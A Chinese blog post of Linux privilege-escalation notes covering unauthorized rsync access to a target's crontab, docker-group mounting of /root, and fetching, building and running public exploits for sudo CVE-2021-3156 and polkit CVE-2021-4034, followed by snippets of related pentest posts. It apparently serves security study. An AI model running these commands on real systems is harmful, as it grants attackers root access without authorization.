linux提权-RSYNC未授权访问覆盖

原创于 2024-11-09 17:38:27 发布

· 368 阅读

2 ·

版权

文章标签：

#linux #服务器 #运维

一.RSYNC未授权访问覆盖提权

rsync rsync://39.101.162.36:873/src/etc/crontab ./，读取目标定时任务

cat crontab 查看定时任务

读取：

二.docker组用户提权

需要用户在docker组

docker run -v /root:/mnt -it alpine

原理：-v将容器外部的目录/root挂载到容器内部/mnt,使用-it参数进入容器shell

三.SUDO(CVE-2021-3156)

SUDO:1.8.2-1.8.31p2
SUDO:1.9.0-1.9.5P1

判断:sudoedit -s /

usage报错则未有漏洞

git clone https://github.com/blasty/CVE-2021-3156.git

cd CVE-2021-3156

make

./sudo-hax-me-a-sandwich <target_number>

dpkg -l policykit-1

四.2021-4034

git clone https://github.com/berdav/CVE-2021-4034.git

cd CVE-2021-4034

make

./cve-2021-4034.sh

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

hzyyyyyyyu

关注关注

5
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

OSCP-Fail（rsync、fail2ban提权）

墨痕诉清风的博客

04-23

700

在这一点上，我发现了一个方法，可以允许我们使用rsync上传文件。考虑到这一点，让我们尝试创建密钥对，看看我们是否可以SSH进入机器。由于fail2ban是以root身份运行的，因此可以让fail2ban基于action. d中的配置运行自定义操作。看到了写入fail2ban的所有action.d文件的能力。为此，将使用netcat使用的rsync枚举。使用rsync，我们可以使用-av -list-only选项列出“fox”共享的内容。使用netcat，我们可以列出rsync托管的当前共享。

权限提升——Linux Rsync未授权访问&docker组挂载&SUDO&Polkit

m0_61506558的博客

01-28

823

2021年01月26日，sudo被披露存在一个基于堆的缓冲区溢出漏洞（CVE-2021-3156，该漏洞被命名为“Baron Samedit”），可导致本地权限提升当在类Unix的操作系统上执行命令时，非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出，从而允许任何本地用户（无论是否在sudoers文件中）获得root权限，无需进行身份验证，且攻击者不需要知道用户密码。

参与评论您还未登录，请先登录后发表或查看评论

Linux提权--Rsync（未授权访问）& Docker 组挂载

金灰的博客

05-13

825

rsync是Linux下一款数据备份工具，支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口，如果目标开启了rsync服务，并且没有配置ACL或访问密码，我们将可以读写目标服务器文件。借助 Linux 默认计划任务调用/etc/cron.hourly，利用 rsync 连接覆盖.

Rsync未授权访问-vulfocus

c0529的博客

06-23

850

Rsync是linux上文件传输的协议，如果有返回直接可以看到，部分主机使用协议的时候不会加密码，就容易造成未授权访问漏洞。

【权限提升】Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

今天是几号的博客

03-05

630

v将容器外部的目录/root(其他目录也可以) 挂载到容器内部/mnt，使用-it参数进入容器shell。如：CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等。管理员将真实物理机/root目录挂载到容器内部/mnt中，-it参数进入容器shell，补充：拿到普通用户权限后，并且该用户在docker中，意思就是可以控制docker服务。-复现：创建用户归类目录，添加到docker组。sudoedit -s / 报错则存在。-利用：普通本地用户权限。

SUDO(CVE-2021-3156复现）提权&rsync未授权访问提权

m0_62207170的博客

03-06

873

SUDO(CVE-2021-3156复现）提权&rsync未授权访问提权

应用协议漏洞-Rsync+协议+漏洞批扫

xiaoheizi的博客

07-12

745

msfconsole是一个强大的接口程序。rsync rsync://123.58.224.8:20700/src/etc/crontab /root/cc.txt 查看crontab中的内容，发现有一个每17分钟执行一次/etc/cron.hourly文件的定时任务。命令：rsync -av shell rsync://123.58.224.8:22700/src/etc/cron.hourly。漏洞存在，可以读取文件：rsync rsync://123.58.224.8:58725/src/tmp/

使用Rsync备份Windows和Linux服务器的文件

最新发布

weixin_44174857的博客

08-29

2586

用来备份公司内部的jumpserver数据库、wiki数据、禅道数据，防止出现数据丢失的情况要求保留n天之内的数据，所以。

【Linux】rsync远程同步工具

ageovb的专栏

02-11

323

rsync（Remote Synchronize，远程同步）是Linux系统下的数据镜像备份工具。使用快速增量备份工具可以远程同步，支持本地复制，或者与其他SSH、rsync主机同步。特性无须特殊权限即可安装。支持匿名传输，以方便进行网站镜像。可以镜像保存整个目录树和文件系统。可以很容易做到保持原来文件的权限、时间、软硬链接等等。快速：第一次同步时 rsync 会复制全部内容，但在下一次只传输修改过的文件。rsync 在传输数据的过程中可以实行压缩及解压缩操作，因此可以使用更少的带宽。安.

Linux权限提升总结

m0_66458291的博客

04-01

1717

本文总结了Linux的一些提权检测项目和常见的提权方式，如suid提权 CVE提权，脏牛漏洞提权、脏管道提权、环境变量提权、定时任务天、权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权。

第105天：权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE

qq_46081990的博客

06-22

485

【代码】第105天：权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE。

权限提升-Linux提权-Rsync 未授权访问-Docker组挂载-sudo权限提升(CVE-2021-3156)-Polkit(CVE-2021-4034)

xiaoheizi的博客

09-04

493

一个综合类探针：一个自动化提权：两个信息收集：两个漏洞探针：二进制文件提权查询：

20210424web渗透学习之命令注入提权的常见方法%ctf题目（通配符在野、tar、chown、rsync、ln）

qq_45290991的博客

04-24

1475

命令执行到提权 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> Zedd / 2019-03-1...

漏洞利用——Rsync匿名访问漏洞

aming小老弟

01-31

3386

QQ 1285575001 Wechat M010527 技术交流 QQ群599020441 纪年科技aming Rsync匿名访问漏洞 Rsync简介什么是Rsync Rsync（remote synchronize）是一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件。什么是Rsync的匿名访问匿名访问很简单，不需要用户名，不需要身份验证的所有信息（包括各种口令...

rsync的几则tips（渗透技巧）

Coisini的博客

06-21

1267

关于rsync rsync(remote synchronize)——Linux下实现远程同步功能的软件，能同步更新两处计算机的文件及目录。在同步文件时，可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新，因此使用人群多为开发人员；而开发人员安全意识薄弱、安全技能欠缺往往是导致rsync出现相关漏洞的根源。 rsync默认配置文件为/etc/rsyncd.c...

Rsync安全配置&利用

3569

12-03

999

1、Rsync简介 Rsync（remote synchronize）是一款实现远程同步功能的软件，它在同步文件的同时，可以保持原来文件的权限、时间、软硬链接等附加信息。 rsync是用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法，而且可以通过ssh方式来传输文件，提高其保密性。此外，rsync是一款免费的软件。 rsync 包括如下的一些特性：

rsync未授权访问漏洞

Kevin's Blog

08-06

3566

文章目录一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用（下载任意文件）3.3 漏洞利用（提权、反弹shell）四、修复建议一、漏洞介绍二、漏洞环境三、漏洞利用 3.1 漏洞探测》》nmap扫描对方是否存在rsync服务，默认端口873，可能更改成了其它端口》》列出目标服务器目录：（两个方法皆可）》》查看目录中的文件，如能查看说明存在未授权访问漏洞或者 rsync rsync://<ip>:<port>/src 3.2 漏洞利用（下载任意文件

【学习笔记】常见的提权方式

chualam的博客

10-29

1253

提权：linux 内核提权配置错误提权（用dirtycow提权） windows 系统漏洞提权 msf 前提：已经通过nc -lvv 监听 find /usr/bin -perm -us=s usid权限文件查询 ls -la /usr/bin/passwd 看到-rwsr-xr-x 1 说明存在suid位如何提权？用vim.basic提权（可以编辑root才能运行的文件）然后用python -c 'import pty;pty.spawn("/bin/bash")' 交互式sh...

Linux运维实战：优化、同步与Web服务器配置

《老男孩Linux运维笔记--文字版》是一本专注于Linux系统运维的实践手册，内容覆盖了多个关键领域，旨在提升运维人员的系统管理效率。以下是章节概览及深入讲解的知识点： 1. **Linux安装后基本优化** - 配置yum源...